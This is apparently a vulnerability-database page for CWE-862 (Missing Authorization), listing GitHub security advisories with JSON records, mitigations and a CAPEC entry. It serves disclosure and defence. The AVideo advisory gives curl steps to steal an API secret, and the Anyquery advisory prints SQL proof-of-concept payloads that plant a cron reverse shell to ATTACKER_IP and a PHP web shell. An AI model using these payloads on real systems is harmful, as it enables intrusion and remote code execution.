Common Weakness Enumeration

CWE-862

Allowed-with-Review

Missing Authorization

Abstraction: Class · Status: Incomplete

The product does not perform an authorization check when an actor attempts to access a resource or perform an action.

14554 vulnerabilities reference this CWE, most recent first.

GHSA-XR49-F4RH-QCJF

Vulnerability from github – Published: 2026-05-05 22:20 – Updated: 2026-05-13 14:28
VLAI
Summary
AVideo Vulnerable to Exposure of Sensitive Information to an Unauthorized Actor and Missing Authorization
Details

Summary

An unauthenticated user can read APISecret from objects/plugins.json.php and use it to call protected API endpoints (e.g. users_list) without logging in.

### Details objects/plugins.json.php is public and still exposes plugin object_data containing APISecret. That secret is accepted by plugin/API/get.json.php as authentication.

### PoC 1. Get plugin config (contains APISecret): ```bash curl 'http:///objects/plugins.json.php'

<img width="879" height="94" alt="image" src="https://github.com/user-attachments/assets/027073fc-dccd-4e1d-8450-ad12345e88eb" />

  2. Copy APISecret from response, then call API directly:
  ```bash
  curl --get 'http://<host>/plugin/API/get.json.php' \
    --data-urlencode 'APIName=users_list' \
    --data-urlencode 'APISecret=<APISecret>' \
    --data-urlencode 'rowCount=3' \
    --data-urlencode 'current=1'

image

### Impact Unauthenticated disclosure of sensitive config (APISecret) leading to unauthorized access to protected API data.

### Recommended fix Requiring admin auth for full plugin inventory/config endpoint.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-43885"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T22:20:42Z",
    "nvd_published_at": "2026-05-11T22:22:13Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n  An unauthenticated user can read `APISecret` from `objects/plugins.json.php` and use it to call protected API endpoints\n  (e.g. `users_list`) without logging in.\n\n  ### Details\n  `objects/plugins.json.php` is public and still exposes plugin `object_data` containing `APISecret`.\n  That secret is accepted by `plugin/API/get.json.php` as authentication.\n\n  ### PoC\n  1. Get plugin config (contains `APISecret`):\n  ```bash\n  curl \u0027http://\u003chost\u003e/objects/plugins.json.php\u0027\n```\n\u003cimg width=\"879\" height=\"94\" alt=\"image\" src=\"https://github.com/user-attachments/assets/027073fc-dccd-4e1d-8450-ad12345e88eb\" /\u003e\n\n  2. Copy APISecret from response, then call API directly:\n  ```bash\n  curl --get \u0027http://\u003chost\u003e/plugin/API/get.json.php\u0027 \\\n    --data-urlencode \u0027APIName=users_list\u0027 \\\n    --data-urlencode \u0027APISecret=\u003cAPISecret\u003e\u0027 \\\n    --data-urlencode \u0027rowCount=3\u0027 \\\n    --data-urlencode \u0027current=1\u0027\n```\n\u003cimg width=\"1719\" height=\"170\" alt=\"image\" src=\"https://github.com/user-attachments/assets/edd629be-e75c-40a2-a52f-2f2e6da99b79\" /\u003e\n\n\n  ### Impact\n  Unauthenticated disclosure of sensitive config (APISecret) leading to unauthorized access to protected API data.\n\n  ### Recommended fix\n  Requiring admin auth for full plugin inventory/config endpoint.",
  "id": "GHSA-xr49-f4rh-qcjf",
  "modified": "2026-05-13T14:28:45Z",
  "published": "2026-05-05T22:20:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-xr49-f4rh-qcjf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43885"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/1c36f229d0a103528fb9f64d0a1cc0e1e8f5999b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "AVideo Vulnerable to Exposure of Sensitive Information to an Unauthorized Actor and Missing Authorization"
}

GHSA-XR7X-6C7P-2FW4

Vulnerability from github – Published: 2024-06-14 03:31 – Updated: 2024-06-14 03:31
VLAI
Details

Missing Authorization vulnerability in ExpressTech Quiz And Survey Master.This issue affects Quiz And Survey Master: from n/a through 8.1.16.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-51507"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-14T02:15:09Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in ExpressTech Quiz And Survey Master.This issue affects Quiz And Survey Master: from n/a through 8.1.16.",
  "id": "GHSA-xr7x-6c7p-2fw4",
  "modified": "2024-06-14T03:31:19Z",
  "published": "2024-06-14T03:31:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51507"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/quiz-master-next/wordpress-quiz-and-survey-master-plugin-8-1-16-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XR8H-WJ4V-RX7F

Vulnerability from github – Published: 2023-01-26 21:30 – Updated: 2023-02-03 20:35
VLAI
Summary
Missing permission check in Jenkins TestQuality Updater Plugin
Details

A missing check in Jenkins TestQuality Updater Plugin 1.3 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified username and password.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.plugins:testquality-updater"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-24453"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-01-27T00:58:38Z",
    "nvd_published_at": "2023-01-26T21:18:00Z",
    "severity": "MODERATE"
  },
  "details": "A missing check in Jenkins TestQuality Updater Plugin 1.3 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified username and password.",
  "id": "GHSA-xr8h-wj4v-rx7f",
  "modified": "2023-02-03T20:35:21Z",
  "published": "2023-01-26T21:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24453"
    },
    {
      "type": "WEB",
      "url": "https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2800"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Missing permission check in Jenkins TestQuality Updater Plugin "
}

GHSA-XR96-49C7-2PFC

Vulnerability from github – Published: 2025-12-31 18:30 – Updated: 2026-04-28 21:35
VLAI
Details

Missing Authorization vulnerability in Damian WP Export Categories & Taxonomies allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Export Categories & Taxonomies: from n/a through 1.0.3.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-62079"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-31T16:15:43Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in Damian WP Export Categories \u0026 Taxonomies allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Export Categories \u0026amp; Taxonomies: from n/a through 1.0.3.",
  "id": "GHSA-xr96-49c7-2pfc",
  "modified": "2026-04-28T21:35:52Z",
  "published": "2025-12-31T18:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62079"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/wp-export-categories-taxonomies/vulnerability/wordpress-wp-export-categories-taxonomies-plugin-1-0-3-broken-access-control-vulnerability?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://vdp.patchstack.com/database/wordpress/plugin/wp-export-categories-taxonomies/vulnerability/wordpress-wp-export-categories-taxonomies-plugin-1-0-3-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XR9H-FV82-7R7G

Vulnerability from github – Published: 2025-11-04 15:31 – Updated: 2025-11-05 17:48
VLAI
Details

A lack of authorisation vulnerability has been detected in CanalDenuncia.app. This vulnerability allows an attacker to access other users' information by sending a POST through the parameter 'web' in '/backend/api/buscarSSOParametros.php'.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-41337"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-04T14:15:35Z",
    "severity": "HIGH"
  },
  "details": "A lack of authorisation vulnerability has been detected in CanalDenuncia.app. This vulnerability allows an attacker to access other users\u0027 information by sending a POST through the\u00a0parameter \u0027web\u0027 in \u0027/backend/api/buscarSSOParametros.php\u0027.",
  "id": "GHSA-xr9h-fv82-7r7g",
  "modified": "2025-11-05T17:48:27Z",
  "published": "2025-11-04T15:31:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41337"
    },
    {
      "type": "WEB",
      "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-canaldenunciaapp"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XRCF-6JH3-GGVX

Vulnerability from github – Published: 2026-07-14 18:33 – Updated: 2026-07-14 18:33
VLAI
Summary
Anyquery: Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) via Unrestricted ATTACH DATABASE in Server Mode
Details

Summary

Anyquery's server mode does not disable or restrict native SQLite disk manipulation commands. Unauthenticated attackers connecting to the MySQL-compatible server port can use the ATTACH DATABASE command to write arbitrary SQLite databases to any path on the victim's filesystem where the process has write permissions. This leads to Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) depending on the environment (e.g., by dropping a PHP web shell if a web server is running, or overwriting system cronjobs if running as root).

Details

When Anyquery is launched in Server Mode (anyquery server), it blindly proxies incoming SQL commands to the underlying SQLite engine. SQLite allows dynamic database mounting via the ATTACH DATABASE command, which creates a physical .db file on the filesystem if the file does not exist.

An attacker can connect to the open Anyquery port, attach a new database to a sensitive path (e.g., /var/www/html/shell.php, /etc/cron.d/pwn or /root/.ssh/authorized_keys), create a table, and insert a malicious payload. Although the file will contain a binary SQLite header, standard Linux services like cron, sshd, and web servers like PHP tolerate garbage data and will parse/execute the valid payload lines injected by the attacker.

PoC (Proof of Concept)

  1. Start the server on the victim machine: bash anyquery server --host 0.0.0.0 --port 8070
  2. Connect from an attacker machine: bash mysql -u root -h <VICTIM_IP> -P 8070
  3. Execute the payload to write a malicious cronjob for native RCE (Note: the Anyquery process must have write permissions to the target directory, such as /etc/cron.d or /var/spool/cron/crontabs/): sql ATTACH DATABASE '/etc/cron.d/pwn' AS pwn; CREATE TABLE pwn.task (cmd TEXT); INSERT INTO pwn.task VALUES ('* * * * * root /bin/bash -c "bash -i >& /dev/tcp/ATTACKER_IP/1337 0>&1"');

Alternatively, if a web server is running and the Anyquery process can write to the web root, you can drop a PHP shell: sql ATTACH DATABASE '/var/www/html/shell.php' AS pwn; CREATE TABLE pwn.hacked (cmd TEXT); INSERT INTO pwn.hacked VALUES ('<?php system($_GET["cmd"]); ?>');

If testing locally as a non-root user, you can verify the vulnerability by writing to /tmp: sql ATTACH DATABASE '/tmp/pwn.db' AS pwn; CREATE TABLE pwn.test (cmd TEXT); INSERT INTO pwn.test VALUES ('Hello Anyquery AFW'); Within 60 seconds, the system's cron daemon will ignore the SQLite header, parse the valid cron string, and execute the reverse shell payload with root privileges.

Impact

  • Confidentiality: None (from the write action itself, though combined with LFR it becomes High).
  • Integrity: High. Arbitrary files can be written or overwritten, which corrupts the filesystem.
  • Availability: High. Overwriting critical system files (e.g., configurations, databases) can lead to complete Denial of Service (DoS).
  • CVSS Score: 9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
  • Note: If the process is running with elevated privileges (e.g., root) or inside a web root directory, this escalates to Remote Code Execution (RCE) with a CVSS of 9.8 (Critical).

Remediation

Disable dangerous SQLite functions (ATTACH DATABASE, DETACH DATABASE, etc.) when running in Server Mode. Restrict the MySQL handler so that it only permits operations on the main database or in-memory virtual tables.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 0.4.5"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/julien040/anyquery"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-50006"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-284",
      "CWE-434",
      "CWE-73",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-14T18:33:57Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Summary\nAnyquery\u0027s `server` mode does not disable or restrict native SQLite disk manipulation commands. Unauthenticated attackers connecting to the MySQL-compatible server port can use the `ATTACH DATABASE` command to write arbitrary SQLite databases to any path on the victim\u0027s filesystem where the process has write permissions. This leads to Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) depending on the environment (e.g., by dropping a PHP web shell if a web server is running, or overwriting system cronjobs if running as root).\n\n## Details\nWhen Anyquery is launched in **Server Mode** (`anyquery server`), it blindly proxies incoming SQL commands to the underlying SQLite engine. SQLite allows dynamic database mounting via the `ATTACH DATABASE` command, which creates a physical `.db` file on the filesystem if the file does not exist.\n\nAn attacker can connect to the open Anyquery port, attach a new database to a sensitive path (e.g., `/var/www/html/shell.php`, `/etc/cron.d/pwn` or `/root/.ssh/authorized_keys`), create a table, and insert a malicious payload. Although the file will contain a binary SQLite header, standard Linux services like `cron`, `sshd`, and web servers like `PHP` tolerate garbage data and will parse/execute the valid payload lines injected by the attacker.\n\n## PoC (Proof of Concept)\n1. Start the server on the victim machine:\n   ```bash\n   anyquery server --host 0.0.0.0 --port 8070\n   ```\n2. Connect from an attacker machine:\n   ```bash\n   mysql -u root -h \u003cVICTIM_IP\u003e -P 8070\n   ```\n3. Execute the payload to write a malicious cronjob for native RCE (Note: the Anyquery process must have write permissions to the target directory, such as `/etc/cron.d` or `/var/spool/cron/crontabs/`):\n   ```sql\n   ATTACH DATABASE \u0027/etc/cron.d/pwn\u0027 AS pwn;\n   CREATE TABLE pwn.task (cmd TEXT);\n   INSERT INTO pwn.task VALUES (\u0027* * * * * root /bin/bash -c \"bash -i \u003e\u0026 /dev/tcp/ATTACKER_IP/1337 0\u003e\u00261\"\u0027);\n   ```\n\n   *Alternatively, if a web server is running and the Anyquery process can write to the web root, you can drop a PHP shell:*\n   ```sql\n   ATTACH DATABASE \u0027/var/www/html/shell.php\u0027 AS pwn;\n   CREATE TABLE pwn.hacked (cmd TEXT);\n   INSERT INTO pwn.hacked VALUES (\u0027\u003c?php system($_GET[\"cmd\"]); ?\u003e\u0027);\n   ```\n\n   *If testing locally as a non-root user, you can verify the vulnerability by writing to `/tmp`:*\n   ```sql\n   ATTACH DATABASE \u0027/tmp/pwn.db\u0027 AS pwn;\n   CREATE TABLE pwn.test (cmd TEXT);\n   INSERT INTO pwn.test VALUES (\u0027Hello Anyquery AFW\u0027);\n   ```\nWithin 60 seconds, the system\u0027s cron daemon will ignore the SQLite header, parse the valid cron string, and execute the reverse shell payload with root privileges.\n\n## Impact\n- **Confidentiality:** None (from the write action itself, though combined with LFR it becomes High).\n- **Integrity:** High. Arbitrary files can be written or overwritten, which corrupts the filesystem.\n- **Availability:** High. Overwriting critical system files (e.g., configurations, databases) can lead to complete Denial of Service (DoS).\n- **CVSS Score:** 9.1 (Critical) - `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H`\n  - *Note: If the process is running with elevated privileges (e.g., root) or inside a web root directory, this escalates to Remote Code Execution (RCE) with a CVSS of 9.8 (Critical).*\n\n## Remediation\nDisable dangerous SQLite functions (`ATTACH DATABASE`, `DETACH DATABASE`, etc.) when running in Server Mode. Restrict the MySQL handler so that it only permits operations on the main database or in-memory virtual tables.",
  "id": "GHSA-xrcf-6jh3-ggvx",
  "modified": "2026-07-14T18:33:57Z",
  "published": "2026-07-14T18:33:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/julien040/anyquery/security/advisories/GHSA-xrcf-6jh3-ggvx"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/julien040/anyquery"
    },
    {
      "type": "WEB",
      "url": "https://github.com/julien040/anyquery/releases/tag/0.4.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Anyquery: Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) via Unrestricted ATTACH DATABASE in Server Mode"
}

GHSA-XRF4-HW94-X283

Vulnerability from github – Published: 2024-10-16 03:31 – Updated: 2024-10-16 03:31
VLAI
Details

The Multiline files upload for contact form 7 plugin for WordPress is vulnerable to unauthorized plugin deactivation due to a missing capability check on the mfcf7_zl_custom_handle_deactivation_plugin_form_submission() function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to deactivate the plugin and send a custom reason from the site.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-9891"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-16T02:15:08Z",
    "severity": "MODERATE"
  },
  "details": "The Multiline files upload for contact form 7 plugin for WordPress is vulnerable to unauthorized plugin deactivation due to a missing capability check on the mfcf7_zl_custom_handle_deactivation_plugin_form_submission() function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to deactivate the plugin and send a custom reason from the site.",
  "id": "GHSA-xrf4-hw94-x283",
  "modified": "2024-10-16T03:31:33Z",
  "published": "2024-10-16T03:31:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9891"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3169228"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/tags/2.8.1/multiline-files-for-contact-form-7/multiline-admin.php#L410"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5cf62f45-a142-497e-9838-ce0b1b1bb3d3?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XRFX-HX2G-WGV7

Vulnerability from github – Published: 2025-08-14 21:31 – Updated: 2026-04-01 18:35
VLAI
Details

Missing Authorization vulnerability in Themovation Stratus allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Stratus: from n/a through 4.2.5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-53341"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-14T19:15:35Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in Themovation Stratus allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Stratus: from n/a through 4.2.5.",
  "id": "GHSA-xrfx-hx2g-wgv7",
  "modified": "2026-04-01T18:35:51Z",
  "published": "2025-08-14T21:31:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53341"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Theme/stratusx/vulnerability/wordpress-stratus-theme-theme-4-2-5-broken-access-control-vulnerability?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/theme/stratus/vulnerability/wordpress-stratus-theme-theme-4-2-5-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XRG8-RX83-PG44

Vulnerability from github – Published: 2024-06-11 12:31 – Updated: 2024-06-11 12:31
VLAI
Details

Missing Authorization vulnerability in Themeum Tutor LMS.This issue affects Tutor LMS: from n/a through 2.1.8.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-25799"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-11T10:15:10Z",
    "severity": "HIGH"
  },
  "details": "Missing Authorization vulnerability in Themeum Tutor LMS.This issue affects Tutor LMS: from n/a through 2.1.8.",
  "id": "GHSA-xrg8-rx83-pg44",
  "modified": "2024-06-11T12:31:01Z",
  "published": "2024-06-11T12:31:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25799"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/tutor/wordpress-tutor-lms-plugin-2-1-10-multiple-student-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XRG9-WWRQ-XMX9

Vulnerability from github – Published: 2021-06-16 17:11 – Updated: 2023-10-27 15:33
VLAI
Summary
Missing Authorization in Jenkins Kubernetes CLI Plugin
Details

Jenkins Kubernetes CLI Plugin 1.10.0 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.plugins:kubernetes-cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-21661"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-06-14T19:17:11Z",
    "nvd_published_at": "2021-06-10T15:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Jenkins Kubernetes CLI Plugin 1.10.0 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.",
  "id": "GHSA-xrg9-wwrq-xmx9",
  "modified": "2023-10-27T15:33:07Z",
  "published": "2021-06-16T17:11:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21661"
    },
    {
      "type": "WEB",
      "url": "https://www.jenkins.io/security/advisory/2021-06-10/#SECURITY-2370"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2021/06/10/14"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Missing Authorization in Jenkins Kubernetes CLI Plugin"
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.